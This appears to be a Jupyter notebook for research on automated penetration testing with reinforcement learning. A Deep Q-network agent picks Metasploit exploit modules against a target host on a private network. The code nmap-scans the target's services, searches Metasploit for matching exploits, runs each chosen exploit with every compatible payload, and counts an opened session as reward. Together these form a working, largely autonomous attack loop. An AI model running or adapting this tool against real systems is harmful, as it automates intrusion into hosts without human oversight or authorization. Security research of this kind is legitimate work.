# Deep Q-learning

In [None]:
import numpy as np
import gym
import tensorflow as tf
from tensorflow import keras
from tensorflow.keras.models import Sequential
from tensorflow.keras.layers import Dense, Activation
from tensorflow.keras.optimizers import Adam
from tensorflow.keras.metrics import mean_squared_error

from pymetasploit3.msfrpc import *
import nmap3
import inspect
import nmap3
import lxml
import json
from bs4 import BeautifulSoup
import numpy as np
import pandas as pd
import random
import re
import time
from matplotlib import pyplot as plt
import sys

In [None]:
class DQNAgent:
    """Deep Q-network agent with an epsilon-greedy policy and a replay buffer.

    The network maps a state vector of length ``state_size`` to one Q-value
    per action. Experiences are kept in ``memory_buffer`` (a list of dicts,
    oldest first) and replayed by :meth:`train`.
    """

    def __init__(self, state_size, action_size):
        """Build the Q-network.

        Args:
            state_size: number of features in one encoded state.
            action_size: number of discrete actions (width of the output layer).
        """
        self.n_actions = action_size
        # Hyperparameters:
        # "lr": learning rate of the optimizer
        # "gamma": discount factor applied to the best next-state Q-value
        # "exploration_proba": probability of picking a random action
        # "exploration_proba_decay": exponential decay rate of that probability
        # "batch_size": default number of experiences replayed per train() call
        self.lr = 0.001
        self.gamma = 0.99
        self.exploration_proba = 0.8
        self.exploration_proba_decay = 0.005
        self.batch_size = 32

        # Replay buffer, oldest experience first; only the most recent
        # ``max_memory_buffer`` time steps are kept.
        self.memory_buffer = list()
        self.max_memory_buffer = 2000

        # Two hidden layers of 24 ReLU units; the linear output layer has one
        # unit per action.
        self.model = Sequential([
            Dense(units=24, input_dim=state_size, activation='relu'),
            Dense(units=24, activation='relu'),
            Dense(units=action_size, activation='linear'),
        ])
        # ``learning_rate`` is the supported keyword; ``lr`` is a deprecated alias.
        self.model.compile(loss="mse",
                           optimizer=Adam(learning_rate=self.lr))

    def compute_action(self, current_state):
        """Pick an action for ``current_state`` with an epsilon-greedy policy.

        With probability ``exploration_proba`` a uniformly random action index
        is returned; otherwise the state is forwarded through the network and
        the index of the highest Q-value is returned.
        """
        if np.random.uniform(0, 1) < self.exploration_proba:
            return np.random.randint(self.n_actions)
        q_values = self.model.predict(current_state)[0]
        return np.argmax(q_values)

    def update_exploration_probability(self):
        """Decay the exploration probability exponentially and print it."""
        self.exploration_proba = self.exploration_proba * np.exp(-self.exploration_proba_decay)
        print(self.exploration_proba)

    def store_episode(self, current_state, action, reward, done, next_state=None):
        """Append one experience to the replay buffer.

        Args:
            current_state: state the action was taken in.
            action: index of the action taken.
            reward: reward obtained for that action.
            done: whether the step ended the episode.
            next_state: optional state reached after the action. When it is
                provided, train() bootstraps the target from it.
        """
        self.memory_buffer.append({
            "current_state": current_state,
            "action": action,
            "reward": reward,
            "done": done,
            "next_state": next_state,
        })
        # Drop the oldest experiences once the buffer exceeds its capacity.
        while len(self.memory_buffer) > self.max_memory_buffer:
            self.memory_buffer.pop(0)

    def train(self, batch_size=None):
        """Replay a random batch of stored experiences through the network.

        Args:
            batch_size: number of experiences to sample; defaults to
                ``self.batch_size``. Capped at the current buffer length.
        """
        if batch_size is None:
            batch_size = self.batch_size
        sample_size = min(batch_size, len(self.memory_buffer))
        if sample_size <= 0:
            return

        # Sample indices instead of shuffling the buffer in place: the buffer
        # must stay in insertion order so store_episode() evicts the oldest
        # experience rather than a random one.
        picked = np.random.choice(len(self.memory_buffer), size=sample_size, replace=False)

        for index in picked:
            experience = self.memory_buffer[index]
            # Q-values currently predicted for the stored state
            q_current_state = self.model.predict(experience["current_state"])
            # Bellman target: r + gamma * max_a' Q(s', a') for non-terminal
            # steps whose next state was recorded, otherwise just r.
            q_target = experience["reward"]
            next_state = experience.get("next_state")
            if next_state is not None and not experience["done"]:
                q_target = q_target + self.gamma * np.max(self.model.predict(next_state)[0])
            q_current_state[0][experience["action"]] = q_target
            # Fit the network towards the updated Q-values
            self.model.fit(experience["current_state"], q_current_state, verbose=0)

    def load(self, name):
        """Load network weights from ``name``."""
        self.model.load_weights(name)

    def save(self, name):
        """Save network weights to ``name``."""
        self.model.save_weights(name)

# Environment

In [None]:
def state_loading(state):
    """Render a service state as a short human-readable string.

    The sentinel ``"end"`` is returned unchanged. Otherwise elements 0, 2 and
    3 of ``state`` are joined with single spaces and every occurrence of the
    text ``None`` is stripped out.
    """
    if state == "end":
        return state
    joined = ' '.join(str(state[position]) for position in (0, 2, 3))
    return joined.replace('None', '')

def load_all_exploit():
    """Return every entry of ``client.modules.exploits`` prefixed with ``exploit/``."""
    return ['exploit/' + exploit_name for exploit_name in client.modules.exploits]

def load_all_auxiliary():
    """Return every entry of ``client.modules.auxiliary`` prefixed with ``auxiliary/``.

    This function used to be defined twice in a row with identical bodies;
    the redundant second copy has been folded into this single definition.
    """
    return ['auxiliary/' + module_name for module_name in client.modules.auxiliary]

# Scan a host and return the list of services found on it.
def search_service(ip):
    """Run nmap version detection against ``ip`` and list its services.

    Args:
        ip: address to scan; also used as the key into the nmap report.

    Returns:
        A list with one ``[name, portid, product, version]`` entry per
        reported port. Fields nmap did not report are ``None``. The list is
        empty when the report has no entry for ``ip``.
    """
    nmap = nmap3.Nmap()
    version_result = nmap.nmap_version_detection(ip)
    # Look the host up by the address that was actually scanned rather than
    # by the module-level ``target``.
    host_report = version_result.get(ip) or {}
    result = []
    for port in host_report.get("ports", []):
        # A port entry may come without service details.
        service = port.get('service') or {}
        result.append([
            service.get('name'),
            port.get('portid'),
            service.get('product'),
            service.get('version'),
        ])
    return result

# Kill all sessions and put the environment back into its initial state.
def reset():
    """Kill every open session and set ``env_state`` back to ``'init'``.

    Writes ``sessions -K`` to the shared console. The console itself is left
    open.
    """
    # ``env_state`` must be declared global: a plain assignment here would
    # only create a local variable and leave the environment untouched.
    global env_state
    client.consoles.console(console_cid).write('sessions -K')
    env_state = 'init'

# Check whether the last action succeeded in creating a session.
def check_success():
    """Return True when at least one session is open, killing the sessions.

    When a session exists, ``sessions -K`` is written to the shared console
    before returning.
    """
    session_ids = client.sessions.list.keys()
    if len(session_ids) == 0:
        return False
    client.consoles.console(console_cid).write('sessions -K')
    return True

# Fill in the host options an exploit module still requires.
def fill_requirement(exploit):
    """Point the module's missing ``RHOSTS`` / ``RHOST`` options at ``target``.

    The module is modified in place and the same object is returned. Other
    missing options are left untouched.
    """
    for option_name in exploit.missing_required:
        if option_name in ('RHOSTS', 'RHOST'):
            exploit[option_name] = target
    return exploit

# Execute the selected module, brute-forcing every payload for exploits.
def perform_action(action):
    """Run the module at index ``action`` of the exploit list.

    For an exploit module the missing host options are filled in and the
    module is executed once per entry of ``targetpayloads()``. A payload
    that raises is reported and skipped so the remaining payloads still run.
    An auxiliary module is executed once.

    Args:
        action: index into the list returned by ``load_all_exploit()``.
    """
    choose = load_all_exploit()[action]
    print (choose)
    # Dispatch on the module-type prefix, not on a substring: a path such as
    # 'exploit/.../auxiliary_x' must not be treated as an auxiliary module.
    if choose.startswith('exploit/'):
        exploit = client.modules.use('exploit', choose)
        filled_exploit = fill_requirement(exploit)
        for payload in filled_exploit.targetpayloads():
            try:
                filled_exploit.execute(payload=payload)
            except Exception as err:
                # Report the actual error; printing the ``Exception`` class
                # itself carries no information.
                print ('Payload Exception:', err)
    elif choose.startswith('auxiliary/'):
        exploit = client.modules.use('auxiliary', choose)
        exploit.execute()
        
# Load all the candidate actions (modules) for a service.
def load_action_set(service):
    """Search the console for exploit modules related to ``service``.

    The search keyword is the product (``service[2]``), falling back to the
    service name (``service[0]``) when the product is ``None``. A keyword
    containing ``/`` is split and each part is searched separately.

    Args:
        service: sequence laid out as ``[name, portid, product, version]``.

    Returns:
        The list of ``exploit/<a>/<b>/<c>`` paths found in the console
        output, in output order. Empty when no keyword is available.
    """
    # Only exploit paths are collected. To also collect auxiliary modules,
    # extend the pattern with an ``auxiliary`` alternative.
    pattern = re.compile(r'\bexploit\b/[\w]{1,80}/[\w]{1,80}/[\w]{1,80}', flags=re.I | re.X)

    keyword = service[2]
    if keyword is None:
        keyword = service[0]
    if keyword is None:
        # Neither product nor service name is known: nothing to search for.
        return []

    result = []
    for term in keyword.split("/"):
        if not term.strip():
            continue
        client.consoles.console(console_cid).write('search ' + term)
        # NOTE(review): the console is read right after the write; confirm the
        # search output is already complete at that point.
        output = client.consoles.console(console_cid).read()
        result = result + pattern.findall(output['data'])
    return result

def encode_state(states):
    """Encode a state as a list of ``hash()`` values.

    A string state (such as the ``'end'`` sentinel) is encoded as a single
    token ``[hash(states)]``. Iterating it would hash each character, and the
    result could never contain ``hash("end")``. Any other iterable is encoded
    element by element.

    NOTE(review): ``hash()`` of a ``str`` is salted per interpreter process
    unless ``PYTHONHASHSEED`` is fixed, so encodings are not comparable
    between runs.
    """
    if isinstance(states, str):
        return [hash(states)]
    return [hash(item) for item in states]

In [None]:
# Shared Metasploit RPC client used by every helper in this file.
# NOTE(review): password, host and port are hard-coded here.
client = MsfRpcClient(
    '1234',
    server='172.18.0.7',
    port=55553,
)

In [None]:
# Address of the host the environment scans and attacks.
target = '172.18.0.9'

# Action space: every exploit module known to the client.
all_action = load_all_exploit()# + load_all_auxiliary()

# Console shared by the helpers that write msfconsole commands.
console_cid = client.consoles.console().cid

# Mutable environment state, accessed through ``global`` by the functions below.
env_state = 'init'
env_current_action_set, env_all_target_service, env_action_set = [], [], []
env_reward = 0
env_chech_exploit = False

# Book-keeping for the "stuck on the same service" check. These live at module
# level because env_step() runs once per agent step and the values must
# survive between calls.
env_track_state = ""
env_state_count = 0
ENV_MAX_STEPS_PER_SERVICE = 10


def _next_target_service():
    """Pop a random remaining service, or return ``'end'`` when none is left."""
    if env_all_target_service:
        # randint's upper bound is exclusive, so every index (including the
        # last one) can be drawn.
        return env_all_target_service.pop(np.random.randint(len(env_all_target_service)))
    return 'end'


def env_step(action):
    """Apply ``action`` to the environment and report the outcome.

    On the first call (``env_state == 'init'``) the target is scanned and a
    random service becomes the current state. The action is then performed;
    if a session was created the reward is 100 and the environment moves on
    to another service, otherwise the reward is -10. When the same service
    has stayed current for more than ``ENV_MAX_STEPS_PER_SERVICE`` counted
    steps, the environment also moves on to another service.

    Args:
        action: index of the module to run; ``''`` skips execution.

    Returns:
        ``(reward, done, encoded_state)``. ``done`` is True when the action
        created a session. ``encoded_state`` is ``[hash("end")]`` once every
        service has been consumed.
    """
    global env_state, env_action_set, env_all_target_service, env_reward
    global env_track_state, env_state_count

    done = False

    if env_state == 'init':
        env_all_target_service = search_service(target)
        env_state = _next_target_service()
        env_track_state = ""
        env_state_count = 0
        print(env_state)

    if action != '':
        perform_action(action)
        if action in env_action_set:
            env_action_set.remove(action)

    # Reward function
    if check_success():
        done = True
        env_reward = 100
        print ('Exploited: ', state_loading(env_state), action, env_reward)
        env_state = _next_target_service()
        print(env_state)
    else:
        env_reward = -10

    # Give up on a service that has been the current state for too long.
    current_label = state_loading(env_state)
    if current_label == env_track_state:
        if env_state_count > ENV_MAX_STEPS_PER_SERVICE:
            env_state = _next_target_service()
            if env_state != 'end':
                env_action_set = load_action_set(env_state)
            env_track_state = state_loading(env_state)
            env_state_count = 0
        else:
            env_state_count += 1
    else:
        env_track_state = current_label
        env_state_count = 0

    # Encode the terminal sentinel explicitly as one token so callers can
    # detect it with ``hash("end") in state``.
    if env_state == 'end':
        encoded_state = [hash("end")]
    else:
        encoded_state = encode_state(env_state)
    return env_reward, done, encoded_state

In [None]:
# Cumulative reward after each environment step, appended to by RunRL().
acumulate_reward_list = []


def RunRL(max_steps=300):
    """Run the agent against the environment for at most ``max_steps`` steps.

    The agent is created, its weights are loaded from ``"DeepQmodel"``, and
    the environment is reset. Each step chooses an action, applies it, and
    stores the resulting experience. The cumulative reward is appended to
    ``acumulate_reward_list``. From step 32 onwards the agent is trained and
    its weights are saved after every step. The loop stops early when the
    environment reports the ``"end"`` state.

    If the loop raises an exception or is interrupted from the keyboard, the
    weights are saved and the error is printed instead of being re-raised.

    Args:
        max_steps: upper bound on the number of environment steps.
    """
    state_size = 4
    action_size = len(load_all_exploit())
    agent = DQNAgent(state_size, action_size)
    agent.load("DeepQmodel")
    # Placeholder state used before the environment has produced a real one.
    state = np.array([[hash("Empty State")] * state_size])
    batch_size = 32
    rewards = 0

    reset()

    try:
        for total_steps in range(1, max_steps + 1):
            action = agent.compute_action(state)

            reward, done, next_state = env_step(action)

            # Store the experience only after the step, so the reward and
            # done flag belong to this (state, action) pair and not to the
            # previous one.
            agent.store_episode(state, action, reward, done)

            state = np.array([next_state])

            rewards = rewards + reward
            acumulate_reward_list.append(rewards)

            if done:
                agent.update_exploration_probability()
                agent.save("DeepQmodel")
                print ("Save")

            if total_steps >= batch_size:
                agent.train(batch_size)
                agent.save("DeepQmodel")

            if hash("end") in state:
                print('Finish of Testing')
                break
    except (Exception, KeyboardInterrupt) as err:
        # Keep whatever was learned so far, and report what went wrong,
        # including the message rather than only the exception class.
        agent.save("DeepQmodel")
        print("Error: %s: %s" % (type(err).__name__, err))

In [None]:
# Start the run; RunRL() appends the cumulative reward of each step to
# acumulate_reward_list.
RunRL()

In [None]:
# Plot the cumulative reward recorded after each step.
plt.plot(acumulate_reward_list)
plt.gca().set_xlabel("step")
plt.gca().set_ylabel("reward")
plt.show()